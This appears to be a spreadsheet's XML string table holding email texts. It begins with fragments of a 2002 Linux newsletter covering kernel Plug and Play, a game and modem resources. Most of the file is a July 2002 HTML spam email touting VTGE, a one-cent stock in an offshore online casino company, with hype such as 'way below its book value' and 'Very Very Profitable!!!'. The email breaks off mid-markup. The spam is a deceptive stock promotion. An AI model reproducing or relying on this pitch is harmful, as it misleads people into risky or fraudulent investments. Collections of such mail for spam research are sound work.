 A note on the "for pay" structure of these products seems in order. As you well know, I'm an open source guy through and through. But, this is clearly a case in which the "free" efforts of talented and dedicated developers simply wasn't enough to close the gap. The value of these products easily outweighs their minimal cost. And, if it keeps these developers moving forward, it seems to be the perfect pay model for Linux.&lt;p&gt;&lt;p&gt;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X&lt;/b&gt;&lt;p&gt;
 Today we're looking into the mysteries of Plug and Play support in your Linux kernel configuration.&lt;p&gt;
 There's really not much mystery to it. This section simply asks the question, "Do you want plug and play support in the kernel?" In other words, do you have all the PCI and ISA devices in your system that you'll ever need to have? If you're set solid with your current machine, there's no use to add the overhead of PnP to your system's kernel code, or as a loadable module. If, on the other hand, you've got PCI or (on an older system) ISA slots just begging to be filled, build this support into the kernel or select it as modules.&lt;p&gt;
 See, this kernel gig isn't really so tough. In fairness, we're hitting the high points without a heady discussion of the hidden workings. The discussion of PnP alone could comprise a full series in Penguin Shell. But, so far, the configuration has been pretty straightforward.&lt;p&gt;
 Tomorrow, we &lt;i&gt;will&lt;/i&gt; dive a bit deeper, with a discussion of block device kernel configuration.&lt;p&gt;&lt;p&gt;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&lt;b&gt;LiquidWar&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.ufoot.org/liquidwar/"&gt;http://www.ufoot.org/liquidwar/&lt;/a&gt;&lt;p&gt;
 "Liquid War is a truly original multiplayer wargame. You control an army formed with thousands of pixels (fighters) which look like liquid and try to eat your opponent. You can play against a primitive NPC/AI or up to 5 other human players. Network play is available."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Gnome 2 Installation Notes&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Dale Hirt&lt;/span&gt;&lt;p&gt;
 "As always, am loving the newsletter.  I've been getting it since day one,
 and I love all the stuff that you have put in it.&lt;p&gt;
 "Just a quick word about the Gnome2 installation.  At least so far in my
 installation wonders, I have noticed that you need to install intltool (#15)
 before scrollkeeper (#3), as it is required in order to build.&lt;p&gt;
 Thanks again for a great newsletter."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Linmodems.org&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.linmodems.org/"&gt;http://www.linmodems.org/&lt;/a&gt;&lt;p&gt;
 Linmodems.org is a full-featured site on modem hardware and setup in Linux. This has always been a point of friction with Linux users - finding that the machine you've just coverted doesn't have a Linux-compatible modem, or finding modem configuration to be too difficult. Linmodems.org takes on both these issues with skill and ease. The site includes discussion on hardware, software and chipsets. It also links to sites to walk you through the process of setting up a winmodem in Linux. This is a great resource of your main connection to the e-universe is via a dialup connection.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/07.10.2002.html"&gt;http://www.lockergnome.com/issues/penguinshell/07.10.2002.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@example.com]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</si>
  <si>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Subject: VTGE   7/22/2002 10:24:24 PM
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear me ,
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 5.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;News Letter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body topmargin="0" leftmargin="0"&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;big&gt;July 21, 2002&lt;/big&gt;&lt;/p&gt;
 &lt;p&gt;&lt;big&gt;Greeting fellow Investors, &lt;/big&gt;&lt;/p&gt;
 &lt;p&gt;&lt;big&gt;Take a look at this inexpensive stock!&lt;/big&gt;&lt;/p&gt;
 &lt;table border="2" cellpadding="5" cellspacing="0" style="border-collapse: collapse"
 bordercolor="#008000" width="100%" bgcolor="#000000"&gt;
   &lt;tr&gt;
     &lt;td width="100%" align="center"&gt;&lt;table border="0" cellpadding="5" cellspacing="0"
     style="border-collapse: collapse" bordercolor="#008000" width="762" bgcolor="#000000"&gt;
       &lt;tr&gt;
         &lt;td align="left" width="2"&gt;&lt;/td&gt;
         &lt;td width="740"&gt;&lt;p style="margin-top: 1; margin-bottom: 1" align="left"&gt;&lt;big&gt;&lt;b&gt;&lt;font
         color="#FFFFFF" face="Arial"&gt;Company Profile For:
         &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;font face="Arial" color="#00FF00"&gt;VIRTUAL
         GAMING ENTERPRISES, INC..&lt;/font&gt;&lt;/b&gt;&lt;/big&gt;&lt;/p&gt;
         &lt;p align="left" style="margin-top: 1; margin-bottom: 1"&gt;&lt;font face="Arial" color="#00FF00"&gt;&lt;big&gt;&lt;strong&gt;&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
         OTC:VTGE&lt;/strong&gt;&lt;/big&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border="1" width="100%" cellspacing="0" cellpadding="0" bgcolor="#000000"&gt;
   &lt;tr&gt;
     &lt;td width="100%"&gt;&amp;nbsp;&lt;table border="0" width="99%" bgcolor="#FFFFFF" cellspacing="3"
     cellpadding="4" height="1111"&gt;
       &lt;tr&gt;
         &lt;td width="100%" valign="top" align="center"&gt;&lt;div align="center"&gt;&lt;center&gt;&lt;table border="0"
         width="70%" cellspacing="0"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" width="100%"
             cellspacing="4" bgcolor="#008000" style="border-collapse: collapse" bordercolor="#111111"&gt;
               &lt;tr&gt;
                 &lt;td width="100%" bgcolor="#000000"&gt;&lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px"
                 align="center"&gt;&lt;font color="#00FF00" face="Arial" size="5"&gt;&lt;b&gt;&lt;span
                 style="FONT-FAMILY: Arial"&gt;For your investment consideration!&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font face="Arial"
                 color="#FF0000" size="4"&gt;&lt;b&gt;&lt;span style="FONT-FAMILY: Arial"&gt;OTC:&amp;nbsp;VTGE&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;span
                 style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;&lt;big&gt;&lt;strong&gt;&lt;font
                 color="#00FF00" face="Arial"&gt;With it's current price of &lt;/font&gt;&lt;font face="Arial"
                 color="#FF0000"&gt;$0.01&lt;/font&gt;&lt;font color="#00FF00" face="Arial"&gt; the company is currently
                 trading &lt;/font&gt;&lt;font face="Arial" color="#FF0000"&gt;way below its book value&lt;/font&gt;&lt;font
                 color="#00FF00" face="Arial"&gt; &lt;/font&gt;&lt;font face="Arial" color="#FF0000"&gt;of $0.40/share.&lt;/font&gt;&lt;font
                 color="#00FF00" face="Arial"&gt; A Tremendous investment opportunity has presented itself
                 with VTGE.&amp;nbsp; Legislation has been unsuccessful at slowing the&amp;nbsp; growth of on-line
                 gaming. The company is &lt;/font&gt;&lt;font face="Arial" color="#FF0000"&gt;Way&lt;/font&gt;&lt;font
                 color="#00FF00" face="Arial"&gt; &lt;/font&gt;&lt;font face="Arial" color="#FF0000"&gt;Undervalued&lt;/font&gt;&lt;font
                 color="#00FF00" face="Arial"&gt;!!!!&lt;/font&gt;&lt;/strong&gt;&lt;/big&gt;&lt;/span&gt;&lt;/p&gt;
                 &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/center&gt;&lt;/div&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p&gt;&lt;font color="#FF0000"&gt;&lt;strong&gt;A minimal investment of $1000.00 would buy
         you 100,000 shares of VTGE at the current price!&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font color="#FF0000"&gt;&lt;strong&gt;If the stock moves up to even one fourth of what the
         company says it's current value is, &lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p&gt;&lt;font color="#FF0000"&gt;&lt;strong&gt;your investment could be &amp;quot;Very Very Profitable!!!&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" width="70%" cellspacing="4"
         bgcolor="#008000" height="88" style="border-collapse: collapse" bordercolor="#111111"&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#000000"&gt;&lt;p align="center"&gt;&lt;big&gt;&lt;font color="#00FF00"
             face="Arial"&gt;&lt;strong&gt;Virtual Gaming Enterprises owns, operates, and licenses offshore
             casinos on the Island of Dominica. &lt;/strong&gt;&lt;/font&gt;&lt;/big&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px; TEXT-ALIGN: center"
         align="center"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;&lt;span style="COLOR: #008000"&gt;VIRTUAL GAMING
         ENTERPRISES, INC.&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px; TEXT-ALIGN: center"
         align="center"&gt;&lt;span style="FONT-FAMILY: Arial"&gt;&lt;font size="4"&gt;OTC&lt;font color="#000000"&gt;: &lt;strong&gt;VTGE&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align="center"&gt;&lt;font
         face="Arial" size="2"&gt;&lt;span style="mso-bidi-font-size: 10.0pt"&gt;&amp;nbsp;&lt;O:P&gt; 
         &lt;/O:P&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;div align="center"&gt;&lt;center&gt;&lt;table style="BORDER-COLLAPSE: collapse" borderColor="#008000"
         cellSpacing="0" cellPadding="0" width="90%" bgColor="#000000" border="2"&gt;
 &lt;TBODY&gt;
           &lt;tr&gt;
             &lt;td width="25%"&gt;&lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font
             color="#ffffff"&gt;&lt;b&gt;&lt;span style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;Symbol:&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font color="#ffffff"&gt;&lt;b&gt;&lt;span
             style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;VTGE&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width="25%"&gt;&lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font
             color="#ffffff"&gt;&lt;b&gt;&lt;span style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;DATE:&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font color="#ffffff"&gt;&lt;b&gt;&lt;span
             style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;7-21-2002&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width="25%"&gt;&lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font
             color="#ffffff"&gt;&lt;b&gt;&lt;span style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;Price on&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font color="#ffffff"&gt;&lt;b&gt;&lt;span
             style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;7-19-2002: $0.01&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width="25%"&gt;&lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font
             color="#ffffff"&gt;&lt;b&gt;&lt;span style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;52 Week Range:&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p style="MARGIN-TOP: 1px; MARGIN-BOTTOM: 1px" align="center"&gt;&lt;font color="#ffffff"&gt;&lt;b&gt;&lt;span
             style="FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;$0.0039 - $5.45 info obtained from
             &lt;a href="http://www.bigcharts.com"&gt;bigcharts&lt;/a&gt; &lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
 &lt;/TBODY&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p class="MsoNormal" style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"
         align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align="center"&gt;&lt;center&gt;&lt;table style="BORDER-COLLAPSE: collapse" borderColor="#008000"
         cellSpacing="0" cellPadding="0" width="90%" bgColor="#ffffff" border="2"&gt;
 &lt;TBODY&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgColor="#000000" colSpan="2"&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial"
             color="#00ff00"&gt;Share-Related Items&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgColor="#e1d6d0" colSpan="2"&gt;&lt;p align="center"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;span style="FONT-FAMILY: Arial"&gt;Recent Price (July,&amp;nbsp; 19, 2002) &lt;/span&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;&lt;font face="Arial"&gt;$.01&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;span style="FONT-FAMILY: Arial"&gt;Market Capitalization Approximate&lt;/span&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;&lt;span style="FONT-FAMILY: Arial"&gt;$215k&lt;/span&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;Shares Outstanding Approximate&lt;/font&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;21.8M&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;Approximate Float&lt;/font&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;3.1 M&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;Daily Avg. Volume (50 day)&lt;/font&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;&lt;font face="Arial"&gt;141K&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;Net Tangible Assets Approximate&lt;/font&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;&lt;font face="Arial"&gt;$4M&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;font face="Arial"&gt;Net Asset Value per Outstanding Share Approximate:&lt;/font&gt;&lt;/td&gt;
             &lt;td width="100"&gt;&lt;p align="right"&gt;&lt;font face="Arial"&gt;$0.40&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgColor="#000000" colSpan="2"&gt;&lt;p align="center"&gt;&lt;font color="#ffffff"&gt;&lt;span
             style="FONT-FAMILY: Arial"&gt;&lt;b&gt;Click here to view the chart:&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
 &lt;/TBODY&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;ul style="margin-top:0in" type="disc"&gt;
           &lt;li class="MsoNormal" style="mso-list:l5 level1 lfo4;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;big&gt;&lt;font
             face="Arial"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Audited
             Net Assets slightly under $4M.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;
      mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/big&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li&gt;&lt;p align="left"&gt;&lt;big&gt;&lt;font face="Arial"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Net Asset Value per
             Outstanding Share of Common Stock is approximately $0.40/share.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
      font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/big&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;ul style="margin-top:0in" type="disc"&gt;
           &lt;li class="MsoNormal" style="mso-list:l5 level1 lfo4;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;big&gt;&lt;font
             face="Arial"&gt;&lt;span style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;Strong
             Balance Sheet with no debt.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;
      mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/big&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li class="MsoNormal" style="mso-list:l5 level1 lfo4;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;font
             face="Arial" size="5"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial"&gt;New site enhancements
             and new marketing campaign beginning next quarter&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" cellpadding="0" bgcolor="green"
         style="mso-cellspacing:1.5pt;
  background:green;mso-padding-alt:2.25pt 2.25pt 2.25pt 2.25pt"
         width="312"&gt;
           &lt;tr&gt;
             &lt;td width="310" style="width:100.0%;background:black;padding:2.25pt 2.25pt 2.25pt 2.25pt"&gt;&lt;p
             class="MsoNormal" align="center"&gt;&lt;b&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
   font-family:Arial"&gt;&lt;font
             color="#00FF00"&gt;VIRTUAL GAMING ENTERPRISES, INC.&amp;nbsp; THE COMPANY&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoBodyText" align="left"&gt;&lt;span style="mso-bidi-font-size:10.0pt"&gt;&lt;font
         face="Arial"&gt;&lt;a href="http://www.vtge.com"&gt;Virtual Gaming Enterprises, Inc&lt;/a&gt;.,
         is in the business of gaming over the Internet. Customers are able to play virtual casino
         style games against other members or alone through an Internet connection. The company
         awards prizes and bonuses to its premier players in the same fashion as traditional
         casinos. These awards programs and unparalleled customer service have made Virtual Gaming&amp;#146;s casinos the place to play on The Net.&lt;/font&gt; &lt;o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoBodyText" align="left"&gt;&lt;font face="Arial"&gt;&lt;span
         style="mso-bidi-font-size:10.0pt"&gt;Check it out.&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p class="MsoBodyText" align="left"&gt;&amp;nbsp; &lt;a href="http://www.thecasinothemepark.com"&gt;www.thecasinothemepark.com&lt;/a&gt;&amp;nbsp;
         &lt;/p&gt;
         &lt;p class="MsoBodyText" align="left"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;ul style="margin-top:0in" type="disc"&gt;
           &lt;li class="MsoNormal" style="mso-list:l1 level1 lfo5;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;The company is
             enhancing its already popular casino suite of sites.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li class="MsoNormal" style="mso-list:l1 level1 lfo5;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;The company recently
             signed a development agreement with regional site developer Infoflash.com.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:
      12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
           &lt;/li&gt;
           &lt;li class="MsoNormal" style="mso-list:l1 level1 lfo5;tab-stops:list .5in"&gt;&lt;p align="left"&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt;The company has
             retained Nextleft Tech. to launch an aggressive Marketing campaign.&lt;/span&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
      font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
           &lt;/li&gt;
         &lt;/ul&gt;
         &lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" align="left"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;Virtual Gaming
         Enterprises holds a Master Gaming License from the Commonwealth of Dominica. VTGE asserts
         it is well positioned to capture substantial market share of the growing Internet Gaming
         Business. A recent report from Bear Stearns (NYSE: BSC) experts expect on-line gaming to
         grow to more than $3 billion in 2002. VTGE, through joint ventures and an aggressive
         acquisition campaign, operates over 17 Gaming related websites and a 20% interest in Vegas
         Book.com, a traditional sports book.&lt;/span&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" align="left"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;The recent software
         development agreement with Infoflash.com gives the company a competitive technology
         advantage. Casino players will be will gamble using Flash and Java Games for Desktops and
         Laptops.&lt;span style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/span&gt;Furthermore, Virtual Gaming
         customers will have the ability to gamble using PDA (Personal Digital Assistants) and
         Pocket PC&amp;#146;s.&lt;/span&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;font-family:
 Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;div align="center"&gt;&lt;center&gt;&lt;table border="0" cellpadding="0" bgcolor="green"
         style="mso-cellspacing:1.5pt;
  background:green;mso-padding-alt:2.25pt 2.25pt 2.25pt 2.25pt"&gt;
           &lt;tr&gt;
             &lt;td width="100%" style="width:100.0%;background:black;padding:2.25pt 2.25pt 2.25pt 2.25pt"
             align="left"&gt;&lt;p class="MsoNormal" align="center"&gt;&lt;b&gt;&lt;span
             style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
   font-family:Arial"&gt;&lt;font
             color="#00FF00"&gt;THE MARKET&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&amp;nbsp;&lt;o:p&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;Virtual Gaming owns
         17 casino style gaming sites for simulated gaming over the Internet. The company is
         launching 5 new sites in 2002. &lt;/span&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" align="left"&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;According to &lt;a
         href="http://www.idc.com"&gt;&lt;span style="color:windowtext"&gt;International Data Corp.&lt;/span&gt;&lt;/a&gt;
         (IDC), improved Internet capabilities, next-generation video game consoles, and
         nontraditional gaming platforms will draw 40 million households into online gaming by
         2004, up from 25 million in 2000. Building a diversified revenue base is perhaps the
         biggest challenge facing online gaming companies. Virtual Gaming intends to earn
         additional revenues from licensing its technology and co-branding its games.&lt;/span&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:12.0pt;
 font-family:Arial"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" style="margin-top: 1; margin-bottom: 1" align="center"&gt;&lt;font
         face="Arial" size="4"&gt;&lt;span
         style="color: red; font-weight: 700; text-decoration: underline"&gt;This company is trading
         way under its current value. &lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" style="margin-top: 1; margin-bottom: 1" align="center"&gt;&lt;span
         style="color: red; font-weight: 700; text-decoration: underline"&gt;&lt;font face="Arial"
         size="3"&gt;VIRTUAL GAMING ENTERPRISES, INC., &lt;/font&gt;&lt;font face="Arial"&gt;&lt;big&gt;forcasts&lt;/big&gt;&lt;font
         size="4"&gt; &lt;/font&gt;&lt;/font&gt;&lt;font face="Arial" size="4"&gt;continued acceleration &lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal" style="margin-top: 1; margin-bottom: 1" align="center"&gt;&lt;span
         style="color: red; font-weight: 700; text-decoration: underline"&gt;&lt;font face="Arial"
         size="4"&gt;in revenues and in profits.&lt;/font&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal" align="left"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p class="MsoNormal"&gt;&lt;big&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;
 font-family:Arial"&gt;Projected Vital
         statistics of online casinos in 2002:&lt;/span&gt;&lt;/b&gt;&lt;span
         style="font-size:11.0pt;mso-bidi-font-size:10.0pt;font-family:Arial"&gt; &lt;/span&gt;&lt;span
